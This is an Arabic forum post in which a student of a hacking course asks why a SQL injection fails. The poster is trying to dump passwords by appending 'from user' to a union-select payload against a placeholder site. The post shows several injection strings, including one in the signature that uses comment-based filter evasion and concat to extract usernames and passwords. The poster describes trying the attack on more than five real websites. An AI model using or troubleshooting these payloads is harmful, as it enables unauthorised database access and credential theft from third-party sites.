عرض مشاركة واحدة
قديم 05-24-2010, 11:35 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
TIKTAKram
 
الصورة الرمزية TIKTAKram
 

 

 
إحصائية العضو







TIKTAKram غير متواجد حالياً

إرسال رسالة عبر MSN إلى TIKTAKram إرسال رسالة عبر Yahoo إلى TIKTAKram إرسال رسالة عبر Skype إلى TIKTAKram

 

 

إحصائية الترشيح

عدد النقاط : 10
TIKTAKram is on a distinguished road

افتراضي بخصوص معرفة الباسوارد و علاقته بالأمر from... !


السلام عليكم و رحمة الله و بركاته

أهلا إخواني العناكب

بصراحة إنظممت إلى الدورة بنصيحة عدة إخوان

و هي رائعة و كل الشكر للأخ فولكانو و بعدها لفرقة كلاشنكوف

المهم ... ! تابعت الدروس و هي مفهومة جدا، فقط وصلت إلى درس 5

فهمت كيف أبدأ و كل شيء و كيف أعرف إذ الموقع مصاب و كل هذا

و فهمت الأمر concat و كل شيء

فقط لما أردت أن أطبق ما إستطعت

أنا وجدت أن العمود المصاب هو 3 مع العلم أن لدي 23 عمود ( تم تطبيق الدرس )

وضعت أمر معرفة إصدار القاعدة في مكان 3 و نجح الأمر و ظهر أن الإصدار هو 5

هذا الإستغلال لتفهموني أكثر :

www.xxx.com/xxx/xxx.php?id=-12 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23--

و الآن كي أعرف الباس في الدرس قال أضف from user في الأخير و أغير العمود المصاب إلى pass

يعني يصبح هكذا :

www.xxx.com/xxx/xxx.php?id=-12 union select 1,2,pass,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 ,20,21,22,23 from user--

لكن يظهر لي الخطأ

قلت ممكن كما قال بعض المواقع مانعين الأمر from

جربت في أكثر من 5 مواقع و نفس الشيء

لهذا يا ريت أحد يجد لي المشكلة و يحلها

بالتوفيق و تحياتي للجميع



fow,w luvtm hgfhs,hv] , ughrji fhgHlv from>>> !

التوقيع

تم تغيير الإسم من Syst3m-32 إلى G3nius-Syst3m






ID=-1/**/UNION/**/SELECT 1,2,3,
concat(G3nius-Syst3m,0x3a,PASS),5,6+FROM+VbSpiders.Users--

 


التعديل الأخير تم بواسطة TIKTAKram ; 05-25-2010 الساعة 06:57 PM.

   

رد مع اقتباس